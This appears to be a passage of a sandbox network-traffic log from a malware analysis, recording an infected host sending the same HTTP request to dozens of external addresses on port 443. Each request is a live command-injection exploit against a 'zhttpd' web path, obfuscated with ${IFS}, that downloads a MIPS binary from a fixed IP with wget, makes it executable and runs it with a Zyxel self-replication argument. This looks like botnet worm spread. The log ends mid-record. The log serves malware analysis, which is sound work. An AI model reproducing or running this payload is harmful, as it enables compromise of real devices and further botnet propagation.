                                          Jan 14, 2024 15:46:10.868515015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3008192.168.2.2358772205.32.106.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868532896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3009192.168.2.235782819.227.85.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868541956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3010192.168.2.2354972195.103.212.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868586063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3011192.168.2.2358508200.58.6.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868601084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3012192.168.2.2340598184.81.177.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868630886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3013192.168.2.2344844222.132.129.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868679047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3014192.168.2.233897619.219.228.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868701935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3015192.168.2.235337635.189.220.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868726015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3016192.168.2.234890827.253.124.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868753910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3017192.168.2.2334458101.242.45.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868757963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3018192.168.2.233840066.223.220.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868783951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3019192.168.2.2351164119.70.201.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868801117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3020192.168.2.2348934192.112.195.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868835926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3021192.168.2.235927035.16.131.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868869066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3022192.168.2.2354726120.98.194.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868900061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3023192.168.2.2347556184.206.45.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868913889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3024192.168.2.2356434197.206.44.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868938923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3025192.168.2.234007887.110.215.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868968010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3026192.168.2.233647814.71.217.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868983984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3027192.168.2.2346422117.12.170.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869036913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3028192.168.2.234914467.78.133.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869081020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3029192.168.2.2333410172.164.140.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869090080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3030192.168.2.2345426200.22.6.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869096994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3031192.168.2.234927070.16.177.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869116068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3032192.168.2.235715444.44.57.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869144917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3033192.168.2.2342114117.228.219.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869168997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3034192.168.2.2343870165.109.11.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869187117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3035192.168.2.234145040.239.204.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869216919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3036192.168.2.2348638201.165.240.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869242907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3037192.168.2.2344306200.236.72.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869282007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3038192.168.2.2341114210.59.130.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869282961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3039192.168.2.2341268113.6.206.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869322062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3040192.168.2.2347440132.233.181.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869359016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3041192.168.2.233982012.140.205.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869371891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3042192.168.2.2356406102.69.241.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869390965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3043192.168.2.233410841.167.144.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869435072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3044192.168.2.2342090199.75.215.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869447947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3045192.168.2.2355862137.185.231.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869482994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3046192.168.2.2338930190.189.74.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869527102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3047192.168.2.235584419.172.191.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869570971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3048192.168.2.233433261.79.31.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869570971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3049192.168.2.236070658.166.236.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869599104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3050192.168.2.2348384198.47.57.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869613886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3051192.168.2.2352576187.91.84.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869683027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3052192.168.2.2347098137.196.218.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869698048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3053192.168.2.234132491.130.251.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869724035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3054192.168.2.2357712145.5.115.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869739056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3055192.168.2.2333080101.2.61.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869767904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3056192.168.2.233358412.125.190.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869769096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3057192.168.2.2354898202.247.3.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869820118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3058192.168.2.23570401.56.161.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869841099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3059192.168.2.2354780113.121.196.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869867086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3060192.168.2.2350684221.24.124.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869895935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3061192.168.2.233759269.125.82.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869921923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3062192.168.2.2336394132.95.30.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869923115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3063192.168.2.2342984185.129.56.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869949102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3064192.168.2.2357510153.23.114.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.869966984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3065192.168.2.2342568207.0.116.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870019913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3066192.168.2.2354962207.167.59.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870049000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3067192.168.2.2336300106.174.47.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870059013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3068192.168.2.234496845.219.211.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870091915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3069192.168.2.233287461.158.147.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.870114088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3070192.168.2.2336720101.28.196.194443
                                          TimestampBytes transferredDirectionData
